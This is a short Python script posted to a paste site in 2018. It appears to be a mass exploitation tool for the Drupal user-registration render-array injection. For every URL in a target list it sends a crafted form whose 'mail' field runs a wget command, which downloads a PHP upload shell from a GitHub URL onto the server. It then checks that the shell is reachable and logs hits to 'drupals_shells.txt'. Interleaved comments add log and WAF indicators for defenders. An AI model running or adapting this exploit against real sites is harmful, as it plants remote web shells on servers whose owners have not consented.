
Untitled

a guest Apr 17th, 2018 69 Never
  1. #!/usr/bin/env
  2. import sys
  3. import requests
  4. from multiprocessing.dummy import Pool
  5.  
  6. requests.urllib3.disable_warnings()  # suppresses urllib3 warnings, including those raised for the verify=False requests made in run()
  7.  
  8. try:
         # Input: the file named by the first command-line argument. Each line, stripped of
         # surrounding whitespace, becomes one entry of `target`; run() later uses every
         # entry as a base URL. The file handle is never closed explicitly.
  9.     target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
  10. except IndexError:
          # Only a missing argument is caught; an unreadable or missing file is not handled here.
  11.     exit('Usage: d.py list.txt')
  12.  
  13. payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget https://raw.githubusercontent.com/dr-iman/SpiderProject/master/lib/exploits/web-app/wordpress/ads-manager/payload.php'}
      # Defender notes on the form body above:
      # - The 'mail' field carries Drupal render-array properties as input: '#post_render'
      #   set to 'exec', '#type' set to 'markup', and '#markup' holding a shell command.
      #   This is the registration-form render-array injection against Drupal core; a core
      #   release that strips '#'-prefixed keys from request input is the fix.
      # - Request parameter names containing '[#' on /user/register are a strong signal for
      #   WAF or request-body inspection rules.
      # - The command is a wget of a PHP file from a public GitHub repository. Host-side
      #   indicators are an outbound fetch from the web server to raw.githubusercontent.com
      #   and a new payload.php where the web server process runs (run() expects it to be
      #   reachable at <site>/payload.php).
      # The same static, non-browser User-Agent below is sent on every request run() makes,
      # which makes it a cheap (if weak) access-log indicator.
  14. headers = {'User-Agent': 'Mozilla 5.0'}
  15.  
  16. def run(u):
          # Per-target routine; `u` is one base URL taken from the input list.
          # It sends two requests per target: one POST, then one GET for /payload.php.
  17.     try:
              # Log signature: POST /user/register with element_parents=account/mail/%23value,
              # ajax_form=1 and _wrapper_format=drupal_ajax in the query string.
  18.         url = u + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
              # Certificate verification is disabled; the response `r` is never inspected.
  19.         r = requests.post(url, data=payload, verify=False, headers=headers)
              # Success is judged only by a follow-up GET: the body of <u>/payload.php must
              # contain the marker string below. NOTE(review): the marker suggests the fetched
              # file renders a file-upload form -- confirm against the file itself.
  20.         if 'Select Your File :' in requests.get(u+'/payload.php', verify=False, headers=headers).text:
  21.             print ('\n\aUploaded:', u + '/payload.php\n')
                  # Hits are appended to a local file, one URL per line. Concurrent workers
                  # append to it without any locking.
  22.             with open('drupals_shells.txt', mode='a') as d:
  23.                 d.write(u + '/payload.php\n')
  24.         else:
  25.             print(u, " -> Not exploitable")
  26.     except:
              # Bare except: every error (connection failure, timeout, bad URL) is discarded
              # silently, so a target that errors produces no output at all.
  27.         pass
  28.  
  29. mp = Pool(150)  # multiprocessing.dummy.Pool is thread-backed: up to 150 concurrent workers
  30. mp.map(run, target)  # calls run() once per input line; traffic from one source arrives in bursts, useful for rate-based detection
  31. mp.close()
  32. mp.join()